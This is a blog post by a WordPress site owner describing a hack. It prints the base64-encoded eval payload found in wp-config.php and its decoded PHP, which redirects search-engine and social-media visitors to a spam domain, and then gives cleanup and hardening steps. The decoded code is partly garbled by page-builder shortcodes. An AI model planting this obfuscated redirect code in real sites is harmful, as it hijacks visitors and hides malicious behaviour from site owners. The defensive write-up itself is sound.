I’m embarrassed to say that a site I host was recently hacked and any request coming from a search engine was being redirected to a less then desirable location.

I thought that I’d share what happened and then tell you what I did.

The Malicious Code

The file that was the culprit was the /wp-config.php file in my site root.  I was able to determine this as the file date was not a day when I had edited any files in the site, so I looked in the file and found the following right at the top.

This is PHP code that has been encoded with MIME base64.  This allows the party that added this to my site to “hide” what this code is doing.

Encoded

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KaWYgKCEkcWF6cGxtKXsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpe2hlYWRlcigiTG9jYXRpb246IGh0dHA6Ly8xbGV0b2pkai5zZWxsQ2xhc3NpY3MuY29tLyIpOw0KZXhpdCgpOw0KfQ0KfQ0KfQ0KfQ0KfQ=="));

Finding code like this is quite concerning, to say the least!

Decoded

error_reporting(0);
$qazplm=headers_sent();
$referer=$_SERVER[fusion_builder_container hundred_percent="yes" overflow="visible"][fusion_builder_row][fusion_builder_column type="1_1" background_position="left top" background_color="" border_size="" border_color="" border_style="solid" spacing="yes" background_image="" background_repeat="no-repeat" padding="" margin_top="0px" margin_bottom="0px" class="" id="" animation_type="" animation_speed="0.3" animation_direction="left" hide_on_mobile="no" center_content="no" min_height="none"]['HTTP_REFERER'];
if (!$qazplm){
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){header("Location: http://1letojdj.sellClassics.com/");
exit();
}
}
}
}
}

Basically this is taking requests from search engines (many of them) and then redirecting to a less then desirable site, in this case http://1letojdj.sellClassics.com

What Now?

Change your FTP password.  Immediately.  Do a review of the WordPress Theme you are using, and also review all the plugins you have running.  Update the WordPress Core to the current stable release, and then update any themes and plugins to the highest compatible version.

After removing the code, I installed a WordPress Plugin called BulletProof Security.  One of the things this plugin does is secures the /wp-config.php file, and also scans for base64 code.

you have to protect yourself, and you have to protect your website in the same way.  You do not build a house without locks on the doors, so why let yourself be welcoming to intruders in your web house.  Sure you have to do more than put locks on the doors to your website, but it is certainly a start.

One more thing that you can do is change the permissions on your /wp-config.php file.  I usually attempt to set 400, but some hosting providers will not allow this, so you can see here at NameCheap.com it is set to 600.  At others I have seen 644.   Just as long as User/Group and Everybody do not have Write or Execute, you will be OK.

File Permissions for wp-config.php

[/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]